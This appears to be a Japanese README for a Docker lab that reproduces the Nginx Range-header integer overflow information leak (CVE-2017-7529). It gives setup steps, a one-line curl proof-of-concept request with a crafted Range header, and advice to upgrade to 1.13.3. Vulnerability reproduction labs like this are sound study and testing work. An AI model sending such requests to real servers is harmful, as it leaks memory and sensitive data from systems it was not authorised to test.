Nginxは高性能なWebサーバーであり、リバースプロキシ、キャッシュサーバーなどとして広く使用されているオープンソースのWebサーバーです。
Nginx 1.13.2以下のバージョンにおいて、整数オーバーフローにより攻撃者がRangeヘッダを操作し、本来の応答範囲を超えたメモリ断片や機密情報を漏洩できる脆弱性が存在します。
bash
docker compose up -d
arduino
http://your-ip:8080
bash
curl -v -H "Range: bytes=-9223372036854,5" http://your-ip:8080/
この脆弱性は、単純なHTTPリクエストのみで情報漏洩 (Information Disclosure) を引き起こす可能性があります。
機密性の高い設定情報やその他の漏洩可能性のあるデータが含まれる場合、深刻なセキュリティインシデントにつながる可能性があります。
パッチ: Nginx 1.13.3以上にアップデートすることを推奨
bash
CVE-2017-7529/
├── Dockerfile
├── docker-compose.yml
├── nginx.conf
├── index.html
└── README.md <-- 본 문서